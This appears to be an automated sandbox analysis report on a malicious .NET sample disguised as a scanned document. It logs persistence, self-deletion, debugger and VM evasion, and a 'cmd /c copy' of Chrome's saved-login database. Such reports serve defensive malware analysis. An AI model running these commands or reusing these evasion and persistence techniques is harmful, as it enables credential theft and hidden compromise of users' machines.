Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ZhrptqdzhJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: Scan_Doc_11052020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Scan_Doc_11052020.exeVirustotal: Detection: 19%
Source: Scan_Doc_11052020.exeReversingLabs: Detection: 35%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Scan_Doc_11052020.exe 'C:\Users\user\Desktop\Scan_Doc_11052020.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_Doc_11052020.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe
Source: unknownProcess created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe 'C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe 'C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe' Jump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_Doc_11052020.exe'Jump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\systray.exeFile written: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.iniJump to behavior
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
PE file contains a COM descriptor data directoryShow sources
Source: Scan_Doc_11052020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: Scan_Doc_11052020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdb source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp
Source: Binary string: cmmon32.pdbGCTL source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Scan_Doc_11052020.exe, 00000000.00000002.866787591.0000000005EA0000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.1198574130.0000000004D40000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000E.00000002.1124555745.0000000005CBF000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000F.00000002.1123661907.0000000005720000.00000040.00000001.sdmp, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vrhdctut50jxtp.exe, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F1DE2D push ecx; ret 0_2_05F1DE40
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05364E9C push 2C00005Eh; iretd 0_2_05364EA1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_053639A3 push 850FD83Bh; ret 0_2_053639A9
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_0536D292 push 8BD68B50h; iretd 0_2_0536D2A4
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DBDE2D push ecx; ret 4_2_04DBDE40
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B2D9CD push ds; retf 4_2_00B2D9CE
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B39A82 push eax; ret 4_2_00B39A88
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B39A8B push eax; ret 4_2_00B39AF2
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B252F9 pushfd ; retf 4_2_00B252EA
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B252E9 pushfd ; retf 4_2_00B252EA
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B39AEC push eax; ret 4_2_00B39AF2
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B39A35 push eax; ret 4_2_00B39A88
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B2521A push esi; iretd 4_2_00B25226
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C1DE2D push ecx; ret 14_2_05C1DE40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0579DE2D push ecx; ret 15_2_0579DE40

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\systray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKLJump to behavior
Source: C:\Windows\SysWOW64\systray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKLJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeRDTSC instruction interceptor: First address: 0000000005517244 second address: 000000000551724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeRDTSC instruction interceptor: First address: 00000000055174AE second address: 00000000055174B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000B27244 second address: 0000000000B2724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000B274AE second address: 0000000000B274B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeRDTSC instruction interceptor: First address: 00000000051E7244 second address: 00000000051E724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeRDTSC instruction interceptor: First address: 0000000004D77244 second address: 0000000004D7724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeRDTSC instruction interceptor: First address: 0000000004D774AE second address: 0000000004D774B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeRDTSC instruction interceptor: First address: 00000000051E74AE second address: 00000000051E74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000F07244 second address: 0000000000F0724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000947244 second address: 000000000094724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000009474AE second address: 00000000009474B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000F074AE second address: 0000000000F074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machinesShow sources
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F95595 rdtsc 0_2_05F95595
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeAPI coverage: 2.3 %
Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 5.0 %
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeAPI coverage: 2.2 %
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeAPI coverage: 2.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe TID: 3224Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 824Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 1340Thread sleep time: -55000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe TID: 2204Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe TID: 4868Thread sleep time: -30000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: vrhdctut50jxtp.exe, 0000000F.00000002.1117943880.00000000027A0000.00000004.00000001.sdmpBinary or memory string: VMware
Source: vrhdctut50jxtp.exeBinary or memory string: 01lXXnOEvEHTYeOrs3hGfs4waIYQPAlFaQOCvi6ewWunD2FaSpwFefR1UvSFd0GKq7C6cTAXF8SH0XrfL8k6xDYxx4Q+GjACxSCw3OePvIU77FyXENgPYQqlZnxb1jTMpUD4FAwv3nKCe/3LSahplmkThDkmhhV0ZyDAMCatySM0Q0v6b3UDO7j4UzOaV517j+2bgoohPh9j8rkMayq3185WcNDENX6VQZQnzNpZQvPWuiXqROn/DlSYCVP8Yoay0yFK
Source: vrhdctut50jxtp.exeBinary or memory string: xM0LqGj6LjCrw1w4Y9EDPz9F7Zgl2+0A51M/EsSGFCADue5SU1bWhFrvRMo2sv3k8xtOFUbFdSbnV3M6H5AyxTZ57z6XjTXx9/ke9WA1nggpAHVlbYSyYFbxdNBhe01HZkSPRAEOM+aI+BAUikac707YEwIG0/w8nHj+03KYP80NHgFsuPY6up0sx5W1AR0Ab7UE47UTX88St1OzzIJ7E0mTp6024W65nvogC8ngZH4UOZCWodDFq3mKqCkpp2CWLYrf
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F95595 rdtsc 0_2_05F95595
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_05F0A5F0
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F96DFD mov eax, dword ptr fs:[00000030h]0_2_05F96DFD
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F96DFD mov eax, dword ptr fs:[00000030h]0_2_05F96DFD
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F96DFD mov eax, dword ptr fs:[00000030h]0_2_05F96DFD
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h]0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h]0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h]0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h]0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h]0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h]0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC15E1 mov eax, dword ptr fs:[00000030h]0_2_05EC15E1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F985EA mov eax, dword ptr fs:[00000030h]0_2_05F985EA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F71DE3 mov ecx, dword ptr fs:[00000030h]0_2_05F71DE3
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F71DE3 mov ecx, dword ptr fs:[00000030h]0_2_05F71DE3
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F71DE3 mov eax, dword ptr fs:[00000030h]0_2_05F71DE3
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF75F0 mov eax, dword ptr fs:[00000030h]0_2_05EF75F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF75F0 mov eax, dword ptr fs:[00000030h]0_2_05EF75F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF2DF0 mov eax, dword ptr fs:[00000030h]0_2_05EF2DF0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC95C0 mov eax, dword ptr fs:[00000030h]0_2_05EC95C0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC95C0 mov ecx, dword ptr fs:[00000030h]0_2_05EC95C0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F44DCA mov eax, dword ptr fs:[00000030h]0_2_05F44DCA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F44DCA mov eax, dword ptr fs:[00000030h]0_2_05F44DCA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC2DAA mov eax, dword ptr fs:[00000030h]0_2_05EC2DAA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC2DAA mov eax, dword ptr fs:[00000030h]0_2_05EC2DAA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC2DAA mov eax, dword ptr fs:[00000030h]0_2_05EC2DAA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC2DAA mov eax, dword ptr fs:[00000030h]0_2_05EC2DAA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC2DAA mov eax, dword ptr fs:[00000030h]0_2_05EC2DAA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F815A8 mov eax, dword ptr fs:[00000030h]0_2_05F815A8
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC35B1 mov eax, dword ptr fs:[00000030h]0_2_05EC35B1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F09DAF mov eax, dword ptr fs:[00000030h]0_2_05F09DAF
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF0584 mov eax, dword ptr fs:[00000030h]0_2_05EF0584
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F95595 mov eax, dword ptr fs:[00000030h]0_2_05F95595
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F98589 mov eax, dword ptr fs:[00000030h]0_2_05F98589
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F80D8A mov eax, dword ptr fs:[00000030h]0_2_05F80D8A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1D9D mov eax, dword ptr fs:[00000030h]0_2_05EE1D9D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1D9D mov eax, dword ptr fs:[00000030h]0_2_05EE1D9D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1D9D mov eax, dword ptr fs:[00000030h]0_2_05EE1D9D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1D9D mov eax, dword ptr fs:[00000030h]0_2_05EE1D9D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1D9D mov eax, dword ptr fs:[00000030h]0_2_05EE1D9D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F8E581 mov eax, dword ptr fs:[00000030h]0_2_05F8E581
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F6E58A mov ecx, dword ptr fs:[00000030h]0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F6E58A mov eax, dword ptr fs:[00000030h]0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F6E58A mov eax, dword ptr fs:[00000030h]0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F6E58A mov eax, dword ptr fs:[00000030h]0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EEF591 mov eax, dword ptr fs:[00000030h]0_2_05EEF591
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EEF591 mov eax, dword ptr fs:[00000030h]0_2_05EEF591
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EEF591 mov eax, dword ptr fs:[00000030h]0_2_05EEF591
